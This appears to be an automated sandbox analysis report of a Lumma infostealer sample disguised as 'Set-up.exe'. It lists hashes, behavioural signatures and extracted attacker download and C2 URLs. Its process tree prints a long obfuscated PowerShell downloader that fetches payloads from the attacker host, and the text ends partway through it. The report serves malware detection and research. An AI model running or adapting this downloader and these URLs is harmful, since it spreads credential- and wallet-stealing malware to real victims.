Overview
overview
10Static
static
3Set-up.exe
windows7-x64
10Set-up.exe
windows10-2004-x64
10contactsUX.dll
windows7-x64
3contactsUX.dll
windows10-2004-x64
3msidcrl40.dll
windows7-x64
3msidcrl40.dll
windows10-2004-x64
3msncore.dll
windows7-x64
3msncore.dll
windows10-2004-x64
3msvcr80.dll
windows7-x64
3msvcr80.dll
windows10-2004-x64
3plugins/ac...in.dll
windows7-x64
3plugins/ac...in.dll
windows10-2004-x64
3plugins/ac...in.dll
windows7-x64
3plugins/ac...in.dll
windows10-2004-x64
3plugins/au...in.dll
windows7-x64
3plugins/au...in.dll
windows10-2004-x64
3plugins/au...in.dll
windows7-x64
3plugins/au...in.dll
windows10-2004-x64
3plugins/co...in.dll
windows7-x64
3plugins/co...in.dll
windows10-2004-x64
3plugins/co...in.dll
windows7-x64
3plugins/co...in.dll
windows10-2004-x64
3plugins/vi...in.dll
windows7-x64
3plugins/vi...in.dll
windows10-2004-x64
3plugins/vi...in.dll
windows7-x64
3plugins/vi...in.dll
windows10-2004-x64
3plugins/vi...in.dll
windows7-x64
3plugins/vi...in.dll
windows10-2004-x64
3plugins/vi...in.dll
windows7-x64
3plugins/vi...in.dll
windows10-2004-x64
3updater/nvdisps.dll
windows7-x64
5updater/nvdisps.dll
windows10-2004-x64
5Analysis
-
max time kernel
115s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-11-2024 15:17
Static task
static1
Behavioral task
behavioral1
Sample
Set-up.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Set-up.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
contactsUX.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
contactsUX.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
msidcrl40.dll
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
msidcrl40.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
msncore.dll
Resource
win7-20241010-en
Behavioral task
behavioral8
Sample
msncore.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
msvcr80.dll
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
msvcr80.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
plugins/access/libfilesystem_plugin.dll
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
plugins/access/libfilesystem_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
plugins/access/libimem_plugin.dll
Resource
win7-20241010-en
Behavioral task
behavioral14
Sample
plugins/access/libimem_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
plugins/audio_output/libdirectsound_plugin.dll
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
plugins/audio_output/libdirectsound_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
plugins/audio_output/libwasapi_plugin.dll
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
plugins/audio_output/libwasapi_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
plugins/codec/libavcodec_plugin.dll
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
plugins/codec/libavcodec_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
plugins/codec/libd3d11va_plugin.dll
Resource
win7-20241010-en
Behavioral task
behavioral22
Sample
plugins/codec/libd3d11va_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
plugins/video_output/libdirect3d11_plugin.dll
Resource
win7-20241023-en
Behavioral task
behavioral24
Sample
plugins/video_output/libdirect3d11_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
plugins/video_output/libdirect3d9_plugin.dll
Resource
win7-20240903-en
Behavioral task
behavioral26
Sample
plugins/video_output/libdirect3d9_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
plugins/video_output/libdrawable_plugin.dll
Resource
win7-20241010-en
Behavioral task
behavioral28
Sample
plugins/video_output/libdrawable_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
plugins/video_output/libvmem_plugin.dll
Resource
win7-20241010-en
Behavioral task
behavioral30
Sample
plugins/video_output/libvmem_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
updater/nvdisps.dll
Resource
win7-20240903-en
Behavioral task
behavioral32
Sample
updater/nvdisps.dll
Resource
win10v2004-20241007-en
General
-
Target
Set-up.exe
-
Size
5.5MB
-
MD5
537915708fe4e81e18e99d5104b353ed
-
SHA1
128ddb7096e5b748c72dc13f55b593d8d20aa3fb
-
SHA256
6dc7275f2143d1de0ca66c487b0f2ebff3d4c6a79684f03b9619bf23143ecf74
-
SHA512
9ceaaf7aa5889be9f5606646403133782d004b9d78ef83d7007dfce67c0f4f688d7931aebc74f1fc30aac2f1dd6281bdadfb52bc3ea46aca33b334adb4067ae2
-
SSDEEP
49152:ERUl697ngPTrho9J8kgdjbHNZ5PP/Re5m3mxVN6KEp0v7J7k66ZRkQTXw+sljVop:uAXqnhON8m3mzNHTdw6YSX+sleu5y
Malware Config
Extracted
https://mindfusteps.shop/minz/m4nd.zip
https://mindfusteps.shop/minz/m2nd.zip
https://mindfusteps.shop/minz/m3nd.zip
https://mindfusteps.shop/minz/m1nd.zip
https://mindfusteps.shop/mind/
Extracted
lumma
https://mindfuljournal.shop/api
Signatures
-
Lumma family
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 46 3248 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
RDJUYV.pifpid Process 4144 RDJUYV.pif -
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
RDJUYV.pifdescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dbabech = "\"C:\\ehfecbk\\AutoIt3.exe\" C:\\ehfecbk\\dbabech.a3x" RDJUYV.pif -
Suspicious use of SetThreadContext 2 IoCs
Processes:
Set-up.exeRDJUYV.pifdescription pid Process procid_target PID 1852 set thread context of 4192 1852 Set-up.exe 86 PID 4144 set thread context of 4012 4144 RDJUYV.pif 100 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
RDJUYV.pifvbc.exepowershell.exeSet-up.exemore.comvbc.exepowershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDJUYV.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Set-up.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RDJUYV.pifdescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RDJUYV.pif Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RDJUYV.pif -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
Set-up.exemore.comvbc.exepowershell.exepowershell.exepid Process 1852 Set-up.exe 1852 Set-up.exe 4192 more.com 4192 more.com 4688 vbc.exe 4688 vbc.exe 4688 vbc.exe 4688 vbc.exe 3248 powershell.exe 3248 powershell.exe 3260 powershell.exe 3260 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
Set-up.exemore.compid Process 1852 Set-up.exe 4192 more.com -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 3248 powershell.exe Token: SeDebugPrivilege 3260 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
Set-up.exemore.comvbc.exeRDJUYV.pifpowershell.exedescription pid Process procid_target PID 1852 wrote to memory of 4192 1852 Set-up.exe 86 PID 1852 wrote to memory of 4192 1852 Set-up.exe 86 PID 1852 wrote to memory of 4192 1852 Set-up.exe 86 PID 1852 wrote to memory of 4192 1852 Set-up.exe 86 PID 4192 wrote to memory of 4688 4192 more.com 93 PID 4192 wrote to memory of 4688 4192 more.com 93 PID 4192 wrote to memory of 4688 4192 more.com 93 PID 4192 wrote to memory of 4688 4192 more.com 93 PID 4688 wrote to memory of 3248 4688 vbc.exe 96 PID 4688 wrote to memory of 3248 4688 vbc.exe 96 PID 4688 wrote to memory of 3248 4688 vbc.exe 96 PID 4192 wrote to memory of 4688 4192 more.com 93 PID 4688 wrote to memory of 4144 4688 vbc.exe 98 PID 4688 wrote to memory of 4144 4688 vbc.exe 98 PID 4688 wrote to memory of 4144 4688 vbc.exe 98 PID 4144 wrote to memory of 4604 4144 RDJUYV.pif 99 PID 4144 wrote to memory of 4604 4144 RDJUYV.pif 99 PID 4144 wrote to memory of 4604 4144 RDJUYV.pif 99 PID 4144 wrote to memory of 4012 4144 RDJUYV.pif 100 PID 4144 wrote to memory of 4012 4144 RDJUYV.pif 100 PID 4144 wrote to memory of 4012 4144 RDJUYV.pif 100 PID 4144 wrote to memory of 4012 4144 RDJUYV.pif 100 PID 4144 wrote to memory of 4012 4144 RDJUYV.pif 100 PID 3248 wrote to memory of 3260 3248 powershell.exe 101 PID 3248 wrote to memory of 3260 3248 powershell.exe 101 PID 3248 wrote to memory of 3260 3248 powershell.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\Set-up.exe"C:\Users\Admin\AppData\Local\Temp\Set-up.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\SysWOW64\more.comC:\Windows\SysWOW64\more.com2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\O93LZ727PJ79L0E0TL1CJ7.ps1"4⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOPrOF -Ep BYPAss -W hI -eNc JABlAGQASABIAGYAPQAnAGgASwBjAFUAOgBcAHMAbwBmAHQAVwBhAFIAZQBcAGMAbABhAFMAcwBlAHMAXAAnADsAIAAkAHcAQQBhAGoAPQAkAGUAbgBWADoATABPAGMAQQBsAGEAUABwAEQAQQB0AGEAKwAnAFwAcABSAE8AZwByAEEATQBTAFwAJwA7ACAAJAA5AHYAeABuADUAPQAoAEcARQBUAC0AVwBtAEkAbwBCAGoARQBjAFQAIAAtAEMATABhAHMAUwAgAFcAaQBOADMAMgBfAEMAbwBtAHAAVQB0AGUAcgBTAFkAcwB0AEUAbQApAC4AcABBAFIAVABPAGYAZABPAE0AQQBJAE4AOwAgACQAVgB2AHAAUwA9ADAAOwAgACQAVgA0AHQAbwBuAD0AJwBjADoAXABQAHIAbwBHAHIAQQBNACAARgBpAEwAZQBzAFwAJwA7ACAAJAByADUAUwB1AGkAPQAnAEgASwBMAE0AOgBcAFMATwBmAHQAdwBhAFIARQBcAGMATABBAHMAUwBFAFMAXAAnADsAIAAkAEUAawBRAGQAPQAnAGgAawBDAFUAOgBcAHMATwBmAHQAVwBBAHIARQBcACcAOwAgACQAWQBNAGMAegA9AEAAKAAgACQAdgA0AHQATwBOACsAJwBiAEkAVABiAE8AeABcAGIASQB0AGIAbwB4AC4ARQBYAEUAJwA7ACAAJABXAEEAYQBqACsAJwBDAFkAcABoAEUAcgBvAEMASwAgAEMAWQBTAHkATgBDAFwAQwB5AHAASABlAFIATwBDAEsAIABDAFkAcwB5AG4AQwAuAEUAWABlACcAOwAgACQARQBkAEgAaABmACsAJwBrAEUAZQBwAGsAZQBZACcAOwAgACQAVwBBAGEASgArACcAawBFAEUAdgBPAC0AVwBhAEwAbABlAFQAXABLAEUARQB2AE8AIABsAGkAbgBLAC4AZQBYAGUAJwA7ACAAJABWADQAVABvAE4AKwAnAGwAZQBEAGcAZQByACAAbABJAFYAZQBcAEwAZQBkAGcAZQBSACAAbABJAHYAZQAuAEUAeABlACcAOwAgACQAZQBrAFEAZAArACcAYgBJAFQAQgBvAFgAYQBwAFAAJwA7ACAAJAB3AEEAQQBqACsAJwBUAFIARQBaAE8AUgAgAFMAVQBpAFQAZQBcAFQAUgBFAHoAbwByACAAUwBVAEkAVABFAC4AZQBYAEUAJwA7ACAAJAB3AGEAYQBqACsAJwBSAGEAYgBCAHkALQBkAEUAUwBLAHQATwBwAFwAcgBBAGIAQgB5ACAARABlAHMASwBUAG8AcAAuAEUAWABFACcAOwAgACQARQBLAHEAZAArACcAbQBJAGMAUgBvAFMAbwBmAFQAXABXAGkATgBEAE8AdwBTAFwAYwB1AFIAUgBlAE4AdABWAEUAcgBzAGkATwBuAFwAdQBOAGkAbgBzAHQAQQBMAEwAXABCAGkAdABiAG8AWABBAFAAUAAnADsAIAAkAFIANQBzAFUASQArACcAbABFAGQAZwBlAFIAbABpAFYARQAnADsAIAAkAEUARABoAEgAZgArACcAYQBvAHAAcAAnADsAIAAkAEUARABoAEgARgArACcAVABSAGUAWgBPAHIAcwBVAEkAdABFACcAOwAgACQAdgA0AFQAbwBOACsAJwBiAEMAIABWAEEAVQBMAHQAXABCAGMAVgBhAFUATABUAC4ARQBYAGUAJwA7ACAAJAByADUAUwB1AEkAKwAnAEIAQwB2AGEAdQBsAHQAJwA7ACAAJABXAGEAYQBqACsAJwBLAGUAZQBwAEsAZQBZAC0ARABFAFMAawB0AE8AUABcAEsARQBFAHAAawBFAHkAIABEAGUAcwBrAFQAbwBQAC4AZQB4AEUAJwA7ACAAJABFAEsAcQBEACsAJwByAEUAQQBMACAAcwBlAGMAdQByAGkAdABZAFwAYgBDAHYAYQB1AEwAdAAnADsAIAAkAEUAZABoAGgARgArACcASwBlAEUAVgBPACcAOwAgACQARQBEAEgAaABGACsAJwBMAGkAUQBVAGkAZABuAGUAdABXAG8AcgBrACcAOwAgACQARQBkAEgASABGACsAJwBDAFkAUABoAEUAcgBPAEMASwAnADsAIAAkAGUARABIAEgARgArACcAbwBuAEUAawBFAFkALQB3AEEAbABsAGUAVAAnADsAIAAkAHYANAB0AG8ATgArACcAQgBMAG8AYwBrAFMAVAByAGUAYQBtAFwAYgBsAE8AQwBLAFMAdAByAGUAQQBNACAAZwByAEUARQBuAFwAQgBMAG8AQwBLAFMAdABSAGUAYQBNACAARwBSAEUAZQBuAC4AZQBYAGUAJwA7ACAAJABWADQAdABPAE4AKwAnAE8AbgBlAEsARQBZAFwAbwBuAEUAawBlAHkALgBlAHgAZQAnADsAIAApADsAIAAkAGgATgBvAHoAPQAkAFkAbQBDAFoALgBsAEUATgBHAFQAaAA7ACAAaQBGACAAKAAkADkAdgB4AE4ANQApACAAewAkAHYAdgBwAFMAPQAxAH0AIABFAEwAcwBlACAAewAgAGYAbwByACAAKAAkAE0AOQBwAHcAQQA9ADAAOwAgACQAbQA5AFAAdwBhACAALQBMAHQAIAAkAEgATgBPAHoAIAAtAGEATgBEACAAJAB2AFYAUABTACAALQBFAHEAIAAwADsAIAAkAE0AOQBQAHcAYQArACsAKQAgAHsAIABJAEYAIAAoAHQARQBzAFQALQBwAGEAdABoACAAJAB5AE0AQwBaAFsAJABtADkAUAB3AGEAXQApACAAewAkAFYAdgBQAHMAPQAxAH0AOwB9ADsAfQA7ACAASQBmACAAKAAkAHYAdgBwAHMAIAAtAGUAcQAgADEAKQAgAHsAIABDAGgAZABpAFIAIAAkAEUAbgB2ADoAQQBQAFAAZABBAFQAYQA7ACAAJABSAFIAUgBFAGUAZgBIAEcAPQBnAGUAdAAtAGMATwBtAG0AYQBuAEQAIABFAHgAcABBAG4ARAAtAGEAUgBDAEgASQB2AEUAIAAtAEUAUgByAE8AUgBBAGMAdABJAG8AbgAgAHMAaQBMAEUATgBUAGwAeQBjAE8ATgB0AEkAbgBVAEUAOwAgACQAdABsAGUAUQByAFkAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAGkAbgBkAGYAdQBzAHQAZQBwAHMALgBzAGgAbwBwAC8AbQBpAG4AegAvAG0ANABuAGQALgB6AGkAcAAnADsAIAAkAFYAagByAEYAdABDAGcARwA9ACcAaAB0AHQAcABzADoALwAvAG0AaQBuAGQAZgB1AHMAdABlAHAAcwAuAHMAaABvAHAALwBtAGkAbgB6AC8AbQAyAG4AZAAuAHoAaQBwACcAOwAgACQAYgBFAHoAZwBqAHYAUQBJAD0AJwB2AGQAZgBvAHIANABoAHEALgB6AGkAcAAnADsAIAAkAHkAWABDAFAAZQBNAFEAUgA9AEcAQwBNACAAUwB0AGEAUgB0AC0AYgBpAHQAcwBUAFIAQQBuAFMAZgBFAFIAIAAtAEUAcgBSAG8AUgBhAEMAVABJAE8ATgAgAHMAaQBMAGUATgBUAGwAeQBDAE8AbgB0AEkATgBVAGUAOwAgACQAOABHAFEAOQBuAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAGkAbgBkAGYAdQBzAHQAZQBwAHMALgBzAGgAbwBwAC8AbQBpAG4AegAvAG0AMwBuAGQALgB6AGkAcAAnADsAIAAkADgAVABnAHEAMwBFADUAPQAnADMAcQBvADMARgBjAE8ALgB6AGkAcAAnADsAIAAkAGcARwBCAEQAcgBuAGwAPQAnAFMAbQBhAHIAdABEAGUAZgByAGEAZwBUAG8AbwBsACcAOwAgACQASgBmAEMAaQBuAEcAPQAnADEAYQBLAEgAeABQAEIALgB6AGkAcAAnADsAIABbAE4AZQB0AC4AcwBlAHIAdgBpAGMAZQBwAE8ASQBOAFQAbQBBAE4AYQBHAGUAcgBdADoAOgBTAEUAYwBVAFIAaQBUAHkAUAByAE8AdABvAEMATwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwBVAHIAaQBUAHkAcAByAE8AdABvAGMAbwBsAHQAWQBQAGUAXQA6ADoAdABMAHMAMQAyADsAIAAkAHUARgBHADkAYgA3AGoAegA9ACcAbQBBAEwAbABRAEEALgB6AGkAcAAnADsAIAAkAGIAOAA3AE4AOQB1AD0AJwBoAHQAdABwAHMAOgAvAC8AbQBpAG4AZABmAHUAcwB0AGUAcABzAC4AcwBoAG8AcAAvAG0AaQBuAHoALwBtADEAbgBkAC4AegBpAHAAJwA7ACAAJABVAHAAeABlAHcANgBGAD0AIgAkAGUATgBWADoAYQBQAFAARABBAHQAYQBcACQAOABUAGcAcQAzAEUANQAiADsAIAAkAHQAagBlADYAZwAzAD0AJABFAE4AVgA6AGEAcABQAGQAQQB0AEEALAAgACQAYgBFAHoAZwBqAHYAUQBJACAALQBqAG8AaQBOACAAJwBcACcAOwAgACQAMwBzAFUASABFAFgAbwA9ACIAJABFAE4AdgA6AGEAUABQAGQAYQBUAGEAXAAkAEoAZgBDAGkAbgBHACIAOwAgACQANAA1AFkASgBXAHkAQgA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABFAE4AdgA6AGEAUABQAGQAYQBUAGEALAAgACQAdQBGAEcAOQBiADcAagB6ADsAIAAkAEEAcgBNAFgASQByAFkAdgA9ACIAYgBpAHQAcwBhAEQAbQBJAE4ALgBlAFgAZQAgAC8AVAByAEEAbgBzAGYARQByACAANgBEAHIAeQA2AGgAcABvACAALwBEAE8AdwBuAGwATwBBAEQAIAAvAFAAUgBpAE8AcgBJAFQAWQAgAG4AbwBSAE0AYQBsACAAJABWAGoAcgBGAHQAQwBnAEcAIAAkAFUAcAB4AGUAdwA2AEYAIgA7ACAAJAAxAG0AcABoAHUAVABTAGkAPQAiACQARQBuAFYAOgBhAHAAcABEAGEAdABBAFwAJABnAEcAQgBEAHIAbgBsACIAOwAgACQAQwBLAGcAbABkAFYAPQAiAGIAaQBUAFMAQQBkAG0AaQBOAC4ARQB4AEUAIAAvAHQAUgBhAE4AcwBmAGUAcgAgADAAbQAxAFkAcwBMADcAIAAvAGQATwB3AG4ATABvAEEAZAAgAC8AUAByAEkAbwByAEkAVABZACAATgBvAFIAbQBBAGwAIAAkADgARwBRADkAbgB0ACAAJAB0AGoAZQA2AGcAMwAiADsAIAAkAHUARQB4AFoANgBSAFAARAA9ACcAYgBJAFQAUwBhAGQATQBpAG4ALgBlAHgAZQAgAC8AdABSAEEAbgBTAGYARQBSACAAcABYAFIAUABEAGYAdAAgAC8ARABvAFcATgBsAG8AQQBkACAALwBwAFIASQBvAFIASQB0AFkAIABuAE8AcgBtAGEAbAAgACcAKwAkAGIAOAA3AE4AOQB1ACsAJwAgACcAKwAkADMAcwBVAEgARQBYAG8AOwAgACQAcABGADcASAA1AEoAVQA9ACIAYgBJAFQAUwBhAGQATQBpAG4ALgBlAHgAZQAgAC8AdABSAEEAbgBTAGYARQBSACAAcABYAFIAUABEAGYAdAAgAC8ARABvAFcATgBsAG8AQQBkACAALwBwAFIASQBvAFIASQB0AFkAIABuAE8AcgBtAGEAbAAgAHsAMAB9ACAAewAxAH0AIgAgAC0AZgAgACQAYgA4ADcATgA5AHUALAAgACQANAA1AFkASgBXAHkAQgA7ACAASQBmACAAKAAkAFIAUgBSAEUAZQBmAEgARwApACAAewAgAEkARgAgACgAJAB5AFgAQwBQAGUATQBRAFIAKQAgAHsAIABTAHQAYQByAHQALQBCAEkAVABTAHQAcgBhAE4AUwBmAGUAUgAgAC0AUwBvAFUAcgBjAGUAIAAkAFYAagByAEYAdABDAGcARwAgAC0ARABlAHMAdABJAG4AQQB0AEkATwBuACAAJABVAHAAeABlAHcANgBGADsAIABzAFQAYQByAHQALQBCAEkAVABzAHQAUgBBAE4AUwBGAEUAUgAgAC0AcwBPAHUAUgBjAEUAIAAkADgARwBRADkAbgB0ACAALQBkAEUAUwBUAGkAbgBBAFQAaQBvAG4AIAAkAHQAagBlADYAZwAzADsAIABzAFQAQQByAHQALQBiAEkAVABTAHQAcgBBAE4AUwBmAEUAUgAgAC0AcwBvAFUAcgBjAEUAIAAkAGIAOAA3AE4AOQB1ACAALQBEAEUAcwBUAEkATgBhAHQASQBPAE4AIAAkADMAcwBVAEgARQBYAG8AOwAgAHMAVABBAFIAVAAtAEIAaQBUAHMAdABSAGEAbgBTAEYARQByACAALQBzAE8AdQBSAGMARQAgACQAdABsAGUAUQByAFkAIAAtAEQARQBzAFQAaQBuAGEAdABpAG8ATgAgACQANAA1AFkASgBXAHkAQgA7ACAAfQAgAEUAbABTAEUAIAB7AGkARQBYACAALQBjAG8AbQBtAGEATgBEACAAJAB1AEUAeABaADYAUgBQAEQAOwAgAEkARQBYACAALQBDAG8AbQBtAEEAbgBEACAAJABwAEYANwBIADUASgBVADsAIABpAGUAeAAgAC0AYwBvAG0AbQBhAG4AZAAgACQAQQByAE0AWABJAHIAWQB2ADsAIAAmACAAJABDAEsAZwBsAGQAVgA7ACAAfQAgAEUAeABwAEEATgBEAC0AQQByAGMAaABpAFYAZQAgAC0AUABBAFQAaAAgACQANAA1AFkASgBXAHkAQgAgAC0ARABlAFMAdABJAE4AYQBUAEkAbwBuAFAAYQB0AGgAIAAkADEAbQBwAGgAdQBUAFMAaQA7ACAARQB4AHAAQQBOAEQALQBhAFIAYwBoAGkAVgBFACAALQBQAGEAdABIACAAJAB0AGoAZQA2AGcAMwAgAC0AZABlAHMAdABpAG4AYQBUAEkAbwBOAHAAYQB0AGgAIAAkADEAbQBwAGgAdQBUAFMAaQA7ACAARQB4AFAAQQBOAGQALQBBAFIAQwBIAGkAdgBFACAALQBwAEEAdABIACAAJAAzAHMAVQBIAEUAWABvACAALQBkAEUAUwBUAGkAbgBhAFQAaQBPAE4AcABBAHQASAAgACQAMQBtAHAAaAB1AFQAUwBpADsAIABlAHgAUABBAG4AZAAtAEEAcgBDAGgAaQBWAGUAIAAtAHAAYQB0AGgAIAAkAFUAcAB4AGUAdwA2AEYAIAAtAEQAZQBTAFQAaQBuAGEAdABpAG8ATgBwAEEAdABIACAAJAAxAG0AcABoAHUAVABTAGkAOwAgAFIAbQAgAC0AUABhAFQAaAAgACQAdABqAGUANgBnADMAOwAgAFIARAAgAC0AcABBAFQASAAgACQAVQBwAHgAZQB3ADYARgA7ACAAUgBEACAALQBwAEEAdABIACAAJAA0ADUAWQBKAFcAeQBCADsAIAByAGUATQBPAHYAZQAtAEkAdABlAG0AIAAtAFAAQQBUAGgAIAAkADMAcwBVAEgARQBYAG8AOwAgAH0AIABFAEwAUwBFACAAewAgACQAWgBBAFAAUABmAHQAPQBAACgAJwBwAGMAaQBjAGEAcABpAC4AZABsAGwAJwAsACAAJwBjAGwAaQBlAG4AdAAzADIALgBpAG4AaQAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcATgBTAE0ALgBMAEkAQwAnACwAIAAnAEgAVABDAFQATAAzADIALgBEAEwATAAnACwAIAAnAHIAZQBtAGMAbQBkAHMAdAB1AGIALgBlAHgAZQAnACwAIAAnAEEAdQBkAGkAbwBDAGEAcAB0AHUAcgBlAC4AZABsAGwAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAFAAQwBJAEMASABFAEsALgBEAEwATAAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcALAAgACcAbQBzAHYAYwByADEAMAAwAC4AZABsAGwAJwApADsAIABuAGkAIAAtAFAAQQBUAGgAIAAkAEUAbgB2ADoAYQBQAHAAZABBAHQAQQAgAC0AbgBBAG0AZQAgACQAZwBHAEIARAByAG4AbAAgAC0AaQBUAGUATQBUAHkAUABlACAAJwBkAGkAcgBlAGMAdABvAHIAeQAnADsAIAAkAGcAMQBpADUAcgB4AEIAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAGkAbgBkAGYAdQBzAHQAZQBwAHMALgBzAGgAbwBwAC8AbQBpAG4AZAAvACcAOwAgAEkARgAgACgAJAB5AFgAQwBQAGUATQBRAFIAKQAgAHsAIAAkAFoAQQBQAFAAZgB0ACAAfAAgAEYAbwBSAEUAQQBjAGgALQBPAEIAagBFAEMAdAAgAHsAIAAkAGgARQBWAFQARwB1AHEAbwA9ACQAZwAxAGkANQByAHgAQgArACQAXwA7ACAAJABTAE0ASgBLAE4AUAA9AGoATwBJAE4ALQBwAEEAdABoACAALQBQAEEAdABoACAAJAAxAG0AcABoAHUAVABTAGkAIAAtAGMASABpAGwARABQAGEAVABoACAAJABfADsAIABzAHQAYQBSAHQALQBiAEkAVABTAHQAcgBhAG4AUwBGAEUAUgAgAC0AcwBPAHUAcgBDAGUAIAAkAGgARQBWAFQARwB1AHEAbwAgAC0AZABFAHMAVABpAG4AQQBUAGkAbwBOACAAJABTAE0ASgBLAE4AUAA7ACAAfQA7AH0AIABlAEwAUwBFACAAewAgACQAWgBBAFAAUABmAHQAIAB8ACAAZgBvAFIARQBhAEMASAAtAG8AQgBKAEUAQwBUACAAewAgACQAaABFAFYAVABHAHUAcQBvAD0AJABnADEAaQA1AHIAeABCACsAJABfADsAIAAkAFMATQBKAEsATgBQAD0AJAAxAG0AcABoAHUAVABTAGkALAAgACQAXwAgAC0AagBPAEkATgAgACcAXAAnADsAIAAkAHAAUgBsAHIAYQBhAFoAQwA9ACcAQgBpAHQAUwBhAGQAbQBJAE4ALgBlAHgARQAgAC8AdAByAEEAbgBTAGYARQByACAANgBMAFAAdAA4AEsAMgBnACAALwBkAG8AVwBuAGwAbwBBAGQAIAAvAFAAUgBJAE8AUgBJAFQAeQAgAE4ATwByAE0AQQBMACAAJwArACQAaABFAFYAVABHAHUAcQBvACsAJwAgACcAKwAkAFMATQBKAEsATgBQADsAIABJAEUAWAAgAC0AQwBvAG0AbQBBAG4ARAAgACQAcABSAGwAcgBhAGEAWgBDADsAfQA7ACAAfQA7ACAAfQA7ACAAJAB5AEYAaAB6AEYATAA9AEcASQAgACQAMQBtAHAAaAB1AFQAUwBpACAALQBmAG8AcgBDAGUAOwAgACQAeQBGAGgAegBGAEwALgBhAFQAVABSAGkAYgB1AHQARQBzAD0AJwBIAGkAZABkAGUAbgAnADsAIABDAGgAZABpAFIAIAAkADEAbQBwAGgAdQBUAFMAaQA7ACAAJABYAEMAVQBGAGcAYwBxAD0AIgAkADEAbQBwAGgAdQBUAFMAaQBcAGMAbABpAGUAbgB0ADMAMgAuAG